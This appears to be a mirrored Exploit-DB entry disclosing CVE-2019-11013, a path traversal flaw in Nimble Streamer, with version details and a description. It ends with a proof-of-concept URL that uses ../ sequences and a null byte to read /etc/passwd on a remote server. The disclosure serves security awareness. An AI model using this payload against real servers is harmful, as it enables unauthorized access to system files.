Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal

• Exploit Database
• 15 阅读

• 作者： MaYaSeVeN
  日期： 2019-08-23
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/47301/

• # Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
  # Exploit Author: MAYASEVEN
  # Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/"
  # Published on 08/04/2019
  # Vendor Homepage at "https://wmspanel.com/nimble"
  # Affected Version 3.0.2-2 to 3.5.4-9
  # Tested on 3.5.4-9
  # CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal
  # Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability.
  #Successful exploitation could allow an attacker to traverse the file system to access
  #files or directories that are outside of the restricted directory on the remote server.
  
  
  POC :
   - http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448